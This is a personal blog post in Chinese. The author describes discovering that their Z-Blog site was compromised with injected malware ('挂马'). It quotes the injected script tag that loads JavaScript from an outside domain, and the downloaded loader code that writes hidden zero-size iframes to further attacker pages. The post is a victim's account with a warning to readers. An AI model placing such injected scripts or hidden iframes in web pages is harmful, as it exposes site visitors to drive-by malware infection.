昨天晚上再到Blog上来看时,发现被挂马了!..
所有的页面的第一行都是个script语句!.
<script src=http://www.1tsun.cn/count/js/1.js></script>
我心里!..
..由于没有研究过Z-Blog不知道怎么修改!.想到还有人可能访问我的网站而"受害"!
想到先进入空间的后台管理,把这个域名饿绑定解除,使用备份的域名!.
进入空间后台时也超慢!..怀疑是不是这个服务器下被黑了,可惜不知道此服务器下的其他的网站地址,无从考证!.
漫无头绪啊!.空间里有放广告,统计代码,所以可能性很多,有可能是被这个网站的漏洞或自己上传的Test页面的漏洞被挂马等!
用FlashFXP想把所有页面都下载下来,发现很卡!.X,这时候出现这种事!!.
再过了几分钟,突然发现访问时,360没有弹出页面拦截的提示!.
怎么搞的!?不知道啊!.这时FlashFXP也快了起来!.查看default.asp文件.包含了太多文件,一个文件里又包含了几个文件,这样看.头都会晕的!..此时才感觉到无奈啊!..
不管了,而且也管不了!.
用迅雷把被挂马的这个http://www.1tsun.cn/count/js/1.js下了下来!.
, X(不雅用词),内容如下:
| document.writeln("<IFRAME src=\"http:\/\/www.1tsun.cn\/dir\/index_pic\/news.htm\" width=100 height=1><\/IFRAME>"); document.writeln("<IFRAME src=\"http:\/\/www.1tsun.cn\/dir\/index_pic\/tj.htm\" width=0 height=0><\/IFRAME>"); |
分别又把这两个文件下了下来!.
news.htm:
 |
由于太长了,大家有兴趣就自己研究下,(注:很危险的,不要乱来,砸到花花草草的就不好了!)
tj.html
| <script language="javascript" src="http://count45.51yes.com/click.aspx?id=457288414&logo=11"></script> |
竟然有个统计代码!.我很想
..姑且先到这吧.我研究下!.